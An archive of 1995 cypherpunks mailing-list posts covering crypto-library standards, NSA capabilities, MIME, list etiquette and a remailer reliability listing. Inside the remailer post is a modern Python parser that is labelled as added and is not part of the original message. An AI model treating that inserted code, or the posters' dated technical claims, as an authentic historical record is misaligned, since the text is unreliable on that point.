MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
> 	The other problem we face is that people like Matt write solid
> essays on various things, and no one responds.  People who write
> essays, post solid mathematical results, etc, bemoan this pretty
> regularly.

I agree that this is a problem, but perhaps not so much as we might think.
For one thing, communication sometimes develops in private. For instance, I
exchanged some mail with Matt about Caller ID after his Top 10 Problems list.
More importantly, it takes much more time, and in some cases expertise, to 
compose a good response to a long discourse than to reply to a short opinion
piece or news report. Relatively few people have the time and ability to
formulate a significant extension or rebuttal to a major work. This is
natural and inevitable. It's probably unrealistic to expect a much greater
frequency of such messages.

Black Unicorn writes:
# There is an internet lore that says the more valuable and insightful a 
# given article is, the less response it gets.
# I hope this is right, as most of mine tend to be ignored.

Lately, I've had the feeling that majordomo@toad echoes my epistles only back
to me. None of the longer pieces I've written has elicited so much as a flame 
from Eric, Perry, or even James in a while.

As they say, "opinions are like assholes", and it's easy to argue about them.
Netiquette strenuously discourages people from simply agreeing. This can be
carried too far.

I've encountered an insidious hazard of high-volume lists (such as this) that
probably snares other people too. It's altogether too easy to sit at one's
mailer and merely react to whatever comes along. Obviously, if everyone did
this all the time, nothing of substance would ever be accomplished. It's
therapeutic, IMHO, to step back regularly, refocus on one's long term goals
w.r.t the group, and push new initiatives.

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and Billionaires and Babies)
Date: Mon, 13 Feb 95 00:22:11 PST
To: cypherpunks@toad.com
Subject: Re: standards...
Message-ID: <199502130818.DAA25598@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


>Such programs should make use of encryption modules or
>libraries, and should be able to easily adapt to new
>modules as they become available.

Hmmm.  Did you come in late, or have you seen my posts about the crypto
library I'm working on ("Hastur Crypto Toolkit," nee "GUCAPI")?

>  I.  Public key encryption.
>      C.  Not limited to one public encryption scheme.

AFAIK, RSA is the only feasible PK scheme available.  There's elliptic
curves, of course, but that's patented.

> II.  Block Ciphers

Needn't be block.  Stream cipher works perfectly well for the "fast crypto"
symmetric cipher part.

>      A.  Each block cipher has a committee assigned
>          identification number.

Why a number?  When you can choose between a number and a human-readable
string (and space is not a big issue), choose human-readable.

>      B.  Uses of random session key for encryption for
>          non-public key encryption.
>          1.)  Random session key is encrypted with
>               hash of user supplied password.
>          2.)  Encrypted session key is appended to
>               ciphertext.

Hmmm.   If the session key is a hash of a password, then why on Earth
would you include it?  

>      C.  Function/format standards for easier chaining
>          of multiple block ciphers in user interfaces
>          that implement these functions.
>          1.)  Minimize/mitigate/eliminate use of layer
>               headers that would serve as known plaintext.

We shouldn't be using ciphers that are vulnerable to "known plaintext"
attacks.  RSA is known to be vulnerable to "chosen plaintext" attacks
(see Schneier), but is useful enough that we work around this shortcoming
by RSA encrypting only hashes and session keys.

>III.  Compression
>      A.  Perhaps implemented in the same or similar format
>          used for block ciphers.

Naturally.  In fact, encoding, encryption, and compression are the same
thing: mapping one set of numbers into another.

>Of course, this requires _STANDARDS_.  The cypherpunks are
>the ideal people to define these standards (and start writing
>such modules).  If others are working on this, I'd like to get
>a copy of the standards so that I can contribute some code,
>otherwise I am willing to help draft the standards--although
>the significance of my contributions might amount to an
>occasional unoriginal idea.

As far as I know, there are two standards: the PKCS #11 document from 
RSADSI, which I do not care to follow if I can avoid it.  The other
is the IETF GSSAPI, which should be accommodated.

In general, I very much agree with the thrust of what you're saying.
Which is why I'm folding the crypto work I already have to do for
my company into the larger "general solution" approach.

If you haven't read my postings on GUCAPI/Hastur, please go back and
take a look (send me mail if you'd like a copy).  It very much sounds
to me like you're addressing the same problem that I've been hacking
full-time for the last month or so.

If you're interested in helping, the best things that could possibly
be provided is code released to the public domain that implements:

	- Good random number generators for Macs and PCs, or
	- Implementations of the non-RSAREF symmetric ciphers and hashes,
	 incl. IDEA, RC4, RC5, BLOWFISH, MD4, MD5, SAPPHIRE, GOST,
         SHA, LUC, and LOKI91.  Or any others that seem like a good idea.
	
I'll mention some miscellaneous features that will be in the library
that I haven't brought up yet:

	- It will be trivial to make the UNIX-style filter programs
	that Perry and Matt desire.
	- Specification of a format for outgoing and incoming messages
	will be trivial.  All known old formats (PGP 2.*, RIPEM, etc)
	will be supported by including format specs.

Key _management_ will *not* be supported, though public keys _will_
be imported from PGP and PEM key rings as well as X.509 certificates with
no judgement as to trust (see message from Eric Hughes from the middle
of last week).  Some key translation (x.509 --> PGP) services might be
provided.
- - --
Todd Masco     | "If we don't make utter fools of ourselves from time to time,
cactus@hks.net |  we grow smug - that is, we do not grow at all." - T. Peters
     Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLz7c3hNhgovrPB7dAQHGdQP+Idvw/FxnPgR49z70DCMqgHV6w3UEds3f
vdm0E5P7+3evSB++iTuP/NzOP92CCnen9VTlFX+gAab61g8T9mfT5mYMu3B9iCvi
PWo3/+3XFinypShYJaYyZHWaHkYJtse7A7rFgLhoqQXNPFYdPeSh5XSJqugtfHIm
wK37TDUptS4=
=3wi6
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLz8VwyoZzwIn1bdtAQHQDgGAgURmCoUB4Hop6nPRayXkK//DJ6muBORK
H8Vs6rEiDuYEezGPOT0oIxM4J1aJMuwa
=t78D
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Mon, 13 Feb 95 20:04:16 PST
To: cypherpunks@toad.com
Subject: The NSA (Was Re: Factorin
In-Reply-To: <9502130231.AA19651@snark.imsi.com>
Message-ID: <60.20378.6525.0C1CFB64@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


 "Perry E. Metzger" <perry@imsi.com> writes:
 
PM+The black community also has lots of day-to-day experience that we
  +don't have, and they understand both the threat model and the
  +practical side of things a lot better than we do.
 
Perry,
 
I don't see too much reason to suppose that this is true.  The CIA
has had almost everything wrong since 1960, and it routinely becomes 
clear a few weeks after the fact that smart bombs, air breathing 
missiles, SCUD hunts and the like are an almost total waste of good 
silicon.
 
When the Russians first landed stuff on the Moon it was semi-amateurs 
in England, not the vaunted NASA folks, who were tuned in. 
 
My guess would be that the folks at NSA spend most of their time 
worrying about getting a better parking spot, the same as everybody 
else in Washington.
 
PM+Overall, I'd say that in the long run the open community is going to
  +catch up regardless of what the NSA likes. That does not mean,
  +however, that this is going to happen particularly soon, or that they
  +don't still know decades more than we do.
 
I think you're right about the superiority of the open community, but 
it may not be out there in the future.  It may be accompli.
 
                                   -dlj.

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 *       Gingrich, n. abbrev. :  "Giving to the rich".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Mon, 13 Feb 95 03:26:23 PST
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <17765.792621125.1@nsb.fv.com>
Message-ID: <ojDo69v0Eyt50xSXkP@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 12-Feb-95 Re: MIME based remailing co.. Rick
Busdiecker@lehman.c (1544)

>     Well, I have no idea why you think that MIME is an "atrocity" or
>     "slime", but it is perfectly clear that you have no idea what it
>     actually *is*, since "X-" headers have nothing whatsoever to do with
>     MIME.  The "X-" headers are defined by RFC 822, which has been the
>     standard for Internet mail formats since 1982.

> You base a large conclusion on a small piece of data in combination
> with some poor deduction.  Unless you are claiming that MIME violates
> RFC 822 with respect to the handling of X- headers you have made a
> number of false claims in the paragraph above.

A very interesting claim.  Care to tell me what my "false claims" are,
or is it a secret?

> It is possible for someone to find
> ugliness where you find beauty without them necessarily being
> uninformed.

Of course.  Let me tell you, though, what the real "beauty" of MIME is: 
It is that Internet mail was upgraded from ASCII-text-only to permit
multiple character sets, images, audio, video, and arbitrary extensions,
WITHOUT breaking any existing standards or software.  It is that
multimedia mail was defined in such a way that it can cross existing
ASCII-to-EBCDIC gateways and all manner of other bizarre mail-eating
paths and still be complete and comprehensible on the other end.  That's
the kind of "beauty" we were aiming at, so if your comments are geared
to any specific technical aspects of MIME, this may be the explanation. 
We considered practical functioning and interoperation to be the
operational definition of "beauty".  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 13 Feb 95 06:30:54 PST
To: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Subject: Re: UMich student arrested for rape story
In-Reply-To: <199502130721.XAA24596@igc3.igc.apc.org>
Message-ID: <Pine.3.89.9502130650.A28579-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 Feb 1995, Richard F. Dutcher wrote:
 
> In any case, this is hardly crypto-related.  I would far rather lurk 
> as the mathematicians discuss factoring.  I learn more [even if I 
> only get one word in three :-]

I am sick to the back teeth of people writing "This is not crypto related,
so I should be allowed to have last word."

This is irritating, offensive, and hypocritical.

In addition the claims you make are entirely false, but I won't rebut
them because you have wandered considerably further from crypto and
privacy than did the post that you are replying to.

> 
> "That's libertarians for you - anarchists who want police protection from their slaves."
>                           Kim Stanley Robinson, "Green Mars"

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 13 Feb 95 04:38:53 PST
To: lile@art.net (Lile Elam)
Subject: Re: bill alert...
In-Reply-To: <199502130515.VAA14482@art.net>
Message-ID: <199502131235.GAA02452@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> Do you think this will force folks into using encryption?
> If I was a sysop, I sure would have all my users using
> encryption... :)
> 
> -lile
> 
> 
Then you would have no users. Users resent being made to do anything they
don't want to do. If they decide it is worth it they will do it, otherwise
they go elsewhere.

Take care.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 13 Feb 95 06:49:51 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199502131450.GAA17137@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@204.95.228.28

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"myriad"} = "<remailer@myriad.pc.cc.cmu.edu> cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk pgp hash latent cut ek ksub";
$remailer{"q"} = "<q@c2.org> cpunk pgp hash latent cut ek ksub";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp";
$remailer{"tower"} = "<remailer@tower.techwood.org> cpunk pgp";
$remailer{"eniac"} = "<vanklava@eniac.ac.siue.edu> cpunk pgp hash latent cut ek";
$remailer{"charon"} = "<charon@styx.jpunix.com> cpunk hash latent cut ek";
$remailer{"bonafide"} = "<remailer@bonafide.jpunix.com> cpunk hash latent cut ek";
$remailer{"ford"} = "<ford@prefect.jpunix.com> cpunk hash latent cut ek";
$remailer{"aegis"} = "<aegis@athena.jpunix.com> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.

JPUNIX.COM offers a domain hiding service for remailers. Send email to 
perry@jpunix.com for more information. NOTE: JPUNIX.COM itself does not 
run a remailer. All subdomains of jpunix.com on this list are remailers 
that are not physically located on jpunix.com

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Last ping: Mon 13 Feb 95 6:00:02 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
tower    remailer@tower.techwood.org      *****#*#****     4:34  99.97%
mix      mixmaster@nately.ucsd.edu        ++++++++++++    36:13  99.96%
nately   remailer@nately.ucsd.edu         ++++++++-+++    33:48  99.96%
penet    anon@anon.penet.fi               +++-+++++---  3:28:32  99.99%
rahul    homer@rahul.net                  *#-*+**-***     13:52  99.97%
xs4all   remailer@xs4all.nl               +**+*+++****    11:02  99.94%
bonafide remailer@bonafide.jpunix.com     ##********.-  1:06:02  99.92%
myriad   remailer@myriad.pc.cc.cmu.edu    **********.-  1:07:06  99.84%
vox      remail@vox.xs4all.nl             ..---...--.  23:29:37  99.90%
alumni   hal@alumni.caltech.edu           *##* *+*****     6:35  99.62%
portal   hfinney@shell.portal.com         *##* *+#**#*     4:16  99.62%
c2       remail@c2.org                    ++-+++++++++    42:42  99.49%
q        q@c2.org                         ++-+++++++.+  1:09:16  99.45%
flame    tomaz@flame.sinet.org            **********.-  1:18:51  99.38%
usura    usura@replay.com                 *+ *** *****     8:21  99.22%
ford     ford@prefect.jpunix.com          ++-++++ ++.-  1:46:37  99.21%
bsu-cs   nowhere@bsu-cs.bsu.edu           --**--#*****    27:38  99.18%
soda     remailer@csua.berkeley.edu       ....._. .-.   9:40:51  98.93%
ideath   remailer@ideath.goldenbear.com   --- ------.-  2:40:41  98.55%
charon   charon@styx.jpunix.com           ++-*__****.-  3:38:09  98.24%
syrinx   syrinx@c2.org                    ++-*__******  2:39:40  97.78%
aegis    aegis@athena.jpunix.com              _ -+**.-  4:06:48  96.99%
eniac    vanklava@eniac.ac.siue.edu       +#****    *      5:31  52.27%
rebma    remailer@rebma.mn.org            -     *--    14:20:54  45.33%
desert   remail@desert.xs4all.nl          -_.-_..-     33:07:32  42.87%
extropia remail@extropia.wimsey.com                     5:04:09   1.17%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in reply blocks using Encrypt-Key:
          header.


Raph Levien
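
The listing format documented in the message above can be read mechanically. The following Python sketch is an added example, not part of the original post and not premail's own code: it parses the `$remailer{...}` lines and the ping table, applies the "pgp." key-ID rule and the per-class forwarding header from the feature key, and filters by uptime and latency. The function names are hypothetical, and it assumes the latency column is m:ss or h:mm:ss.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Eight entries copied from the listing above, embedded so the example runs offline.
LISTING = r'''
$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"myriad"} = "<remailer@myriad.pc.cc.cmu.edu> cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
catalyst@netcom.com is _not_ a remailer.

Last ping: Mon 13 Feb 95 6:00:02 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
penet    anon@anon.penet.fi               +++-+++++---  3:28:32  99.99%
xs4all   remailer@xs4all.nl               +**+*+++****    11:02  99.94%
myriad   remailer@myriad.pc.cc.cmu.edu    **********.-  1:07:06  99.84%
vox      remail@vox.xs4all.nl             ..---...--.  23:29:37  99.90%
portal   hfinney@shell.portal.com         *##* *+#**#*     4:16  99.62%
usura    usura@replay.com                 *+ *** *****     8:21  99.22%
bsu-cs   nowhere@bsu-cs.bsu.edu           --**--#*****    27:38  99.18%
extropia remail@extropia.wimsey.com                     5:04:09   1.17%
'''

CONF_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";$')
# The history column may contain blanks or be empty, so it is matched lazily
# between the address and the latency instead of being split on whitespace.
STAT_RE = re.compile(r'^(\S+)\s+(\S+@\S+)\s+([#*+\-._ ]*?)\s*'
                     r'(\d+(?::\d\d){1,2})\s+(\d+(?:\.\d+)?)%\s*$')
# Remailer class -> header naming the next hop, per the feature key in the post.
CLASS_HEADER = {"cpunk": "Request-Remailing-To",
                "eric": "Anon-Send-To",
                "penet": "X-Anon-To"}


@dataclass
class Remailer:
    name: str
    address: str
    flags: set
    key_id: Optional[str]          # PGP key ID to encrypt to, None if no pgp support
    history: str = ""
    latency_s: Optional[int] = None
    uptime: Optional[float] = None


def to_seconds(text):
    """Convert 'm:ss' or 'h:mm:ss' to seconds (assumed meaning of the column)."""
    total = 0
    for part in text.split(":"):
        total = total * 60 + int(part)
    return total


def parse_listing(text):
    """Return {short name: Remailer}; lines matching neither format are skipped."""
    remailers = {}
    for line in text.splitlines():
        m = CONF_RE.match(line.strip())
        if m:
            name, addr, words = m.group(1), m.group(2), m.group(3).split()
            # "pgp." means the short name is the key ID; plain "pgp" means the address.
            key_id = name if "pgp." in words else addr if "pgp" in words else None
            remailers[name] = Remailer(name, addr, {w.rstrip(".") for w in words}, key_id)
            continue
        m = STAT_RE.match(line.rstrip())
        if m and m.group(1) in remailers:
            r = remailers[m.group(1)]
            r.history = m.group(3).strip()
            r.latency_s = to_seconds(m.group(4))
            r.uptime = float(m.group(5))
    return remailers


def forward_header(r):
    """Header that tells this remailer where to send the message next."""
    return next((h for cls, h in CLASS_HEADER.items() if cls in r.flags), None)


def late_days(history):
    """Count pings answered after more than a day ('.') or too late ('_')."""
    return history.count(".") + history.count("_")


def select(remailers, need, min_uptime=99.0, max_latency_s=3600):
    """Names with all required features, ordered by uptime, then latency."""
    ok = [r for r in remailers.values()
          if r.uptime is not None and need <= r.flags
          and r.uptime >= min_uptime and r.latency_s <= max_latency_s]
    return [r.name for r in sorted(ok, key=lambda r: (-r.uptime, r.latency_s))]


if __name__ == "__main__":
    table = parse_listing(LISTING)
    for name in select(table, {"cpunk", "pgp", "cut"}):
        r = table[name]
        print(name, r.address, forward_header(r), "key:", r.key_id)
```
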




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Mon, 13 Feb 95 04:56:41 PST
To: cypherpunks@toad.com
Subject: Archives?
In-Reply-To: <199502130723.CAA15970@ducie.cs.umass.edu>
Message-ID: <199502131255.GAA00423@crl.com>
MIME-Version: 1.0
Content-Type: text


> BTW, with an eye to avoiding rehashes of old flamewars, this does *not*
> constitute an invitation to scour the subscriber list for *.gov and *.mil and
> announce the results. Consult the archives if in doubt on this point.

Where are these archives? I haven't seen them.

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 13 Feb 95 05:23:43 PST
To: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and   Billionaires and Babies)
Subject: Re: standards...
In-Reply-To: <199502130818.DAA25598@bb.hks.net>
Message-ID: <9502131323.AA20121@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



A Loose Affiliation of Millionaires and Billionaires and Babies says:
> >  I.  Public key encryption.
> >      C.  Not limited to one public encryption scheme.
> 
> AFAIK, RSA is the only feasible PK scheme available.  There's elliptic
> curves, of course, but that's patented.

There are plenty of others, like Rabin's scheme, that are quite
practical, but just not used because they are all collectively
patented. After that patent expires in '97 things may change.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Mon, 13 Feb 95 08:34:28 PST
To: cypherpunks@toad.com
Subject: Re: bill alert...
In-Reply-To: <199502131235.GAA02452@einstein.ssz.com>
Message-ID: <950213.082427.4B5.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, root@einstein.ssz.com writes, quoting lile:

>> Do you think this will force folks into using encryption?
>> If I was a sysop, I sure would have all my users using
>> encryption... :)

> Then you would have no users. Users resent being made to do anything they
> don't want to do. If they decide it is worth it they will do it, otherwise
> they go elsewhere.

Some will leave.  Some (one might argue the ones with any basic
intelligence) will stay.  Sure, many users resent being herded.  But the
ones that stick around will be of a higher calibre.

Think of it as evolution in action.
- -- 
Roy M. Silvernail, writing from roy@cybrspc.mn.org
"Ah, man.. you hit the nails right on the heads there.  However, I think
you drove them right into your own forehead."
        -- datsun@wasteland.spam.org (Datsun Q. Wanderer)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLz9u7Rvikii9febJAQFpSwQAta5dfzEET3pmNJYwIGZ2/xH25byGgww7
JB0q/eS/C3WOJQZiygNfqcbkAeY7g5F+1fMHzhKC3CVLLDqlQCSnwFZahEHrjwdO
Z4q+flHeRo7dmPOWsUATdjk/S44BA11SwhgTZeMXJx0HvhRoimMjl06WCkqRmXZl
vbx5SGes33s=
=3pzO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 13 Feb 95 05:42:43 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: The NSA (Was Re: Factoring - State of the Art and Predictions )
Message-ID: <v01510102ab64cd4dbfed@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:09 AM 2/13/95, Black Unicorn wrote:
>There is an internet lore that says the more valuable and insightful a
>given article is, the less response it gets.
>
>I hope this is right, as most of mine tend to be ignored.

On the other hand, they also get forwarded to people not on the list who
may be interested, which helps.  Bruce's went to 3 or 4 mathematically
aware people I know. The work of Messrs. 'corn, Froomkin, Hughes, Finney,
May, et al. get re-zinged all over the place by yours truly.

Some of us don't have the chops to comment on the <mostly> excellent
content of this list. We still appreciate the work.

Thanks to all of you.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syshtg@gsusgi2.gsu.edu (Tom Gillman)
Date: Mon, 13 Feb 95 06:51:10 PST
To: jamesd@netcom.com (James A. Donald)
Subject: Re: UMich student arrested for rape story
In-Reply-To: <Pine.3.89.9502130650.A28579-0100000@netcom9>
Message-ID: <9502131450.AA26342@gsusgi2.gsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Feb 1995, James A. Donald wrote:
> 
> On Sun, 12 Feb 1995, Richard F. Dutcher wrote:
> > In any case, this is hardly crypto-related.  I would far rather lurk 
> > as the mathematicians discuss factoring.  I learn more [even if I 
> > only get one word in three :-]
> 
> I am sick to the back teeth of people writing "This is not crypto related,
> so I should be allowed to have last word."
> 
> This is irritating, offensive, and hypocritical.
> 
> In addition the claims you make are entirely false, but I won't rebut
> them because you have wandered considerably further from crypto and
> privacy than did the post that you are replying to.
> 

And besides, you wanted the last word...

-- 
 Tom Gillman, Unix/AIX Systems Weenie  |"For a privacy advocate to determine
 Wells Computer Center-Ga. State Univ. |the best way to do key escrow is like
 (404) 651-4503 syshtg@gsusgi2.gsu.edu |a death penalty opponent choosing
 My opinions, not GSU's...             |between gas or electricity"-D.Banisar



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: News auto-reply daemon <news@lucy.ee.und.ac.za>
Date: Mon, 13 Feb 95 00:59:18 PST
To: cypherpunks@toad.com
Subject: Automatic reply to your test message   (lwall)
In-Reply-To: <PINE4545-dhfsdkjc@ack.berkeley.edu>
Message-ID: <9502130858.AA27833@lucy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3926.1071713480.multipart/mixed"

--Boundary..3926.1071713480.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

This is an automatic reply, to let you know that a test message from you
(or listing your address in the Reply-To header) recently arrived here
at news system "ee.und.ac.za", which is in the Electronic Engineering
department at the University of Natal, Durban, South Africa.

A lot of people are confused by automatic reply messages, so this
message tries quite hard to explain what is going on.  If you have any
good suggestions for ways in which the wording of this message can be
improved, please send them to <news@ee.und.ac.za>.

Some of the reasons people post test messages are to check whether their
news system is correctly configured to let their messages get out, and
to check whether their mail system is correctly configured to let mail
get back to them.  Because of these uses of test messages, some news
administrators -- trying to be helpful -- configure their news systems
to send automatic responses.

It is possible that somebody tricked you into posting a test message, or
that somebody else forged a test message that either appeared to be from
you or directed replies to you.  If that is what happened to you, then
you may be able to use the information below to help you to track down
the perpetrator.

Each message in almost all of the *.test newsgroups is considered
as a candidate for an automatic reply like this one.  If the message
header or the first few lines of the body contains any of the phrases
"ignore", "no reply", "do not reply" or a few other variants, then
the message is ignored.  If the message does not contain any of those
trigger phrases, then the auto-replier sends back a reply like this
one.  (If you get more than one copy of this reply, that might mean
that there is a problem in the mail system; please ask your local mail
administrator for help.)

It's too late to have any effect on this message, because this reply
has already been sent, but in future, if you do not want to receive
automatic replies like this, then you should either refrain from posting
messages to the *.test newsgroups, or ensure that your postings to the
*.test newsgroups contain the trigger phrases that will cause your
messages to be ignored by auto-repliers.  Please also note that your name
has not been added to any kind of subscription list, so there's no need
to try to unsubscribe or to send "ignore" messages back via electronic
mail.

By the way, this site receives messages in certain newsgroups, or with
certain distributions, that some people might consider to be unusual for
a site in South Africa.  We do that deliberately, so please don't be too
surprised.

If you want to write to the human who administers the news system that
generated this auto-reply message, the address <news@ee.und.ac.za>
should work.


--Boundary..3926.1071713480.multipart/mixed
Content-Type: application/octet-stream; name="bin00001.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00001.bin"
Content-Description: "A copy of the header and the first few lines of   the body of your test message."
--Boundary..3926.1071713480.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Mon, 13 Feb 95 11:12:24 PST
To: cypherpunks@toad.com
Subject: RE: Is Cyberspace Rich Enough?
Message-ID: <9502131912.AA24488@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Timothy C. May

"(Actually, cyberspace is partly getting "bigger" and partly
"increasing in dimensionality." Dimensionality of a space can be
related to how many neighbors one has....think of the two nearest
neighbors one has in a 1-D space, the 4 (or 8 if diagonals are
considered) neighbors in a 2-D space, the 6 in a 3-D space, and so on.
Arguably, if one has "100 close neighbors" in a space, it is roughly a
50 dimensional space. An equivalent formulation is in terms of the
radius of the n-sphere that everyone fits into. For example, the "six
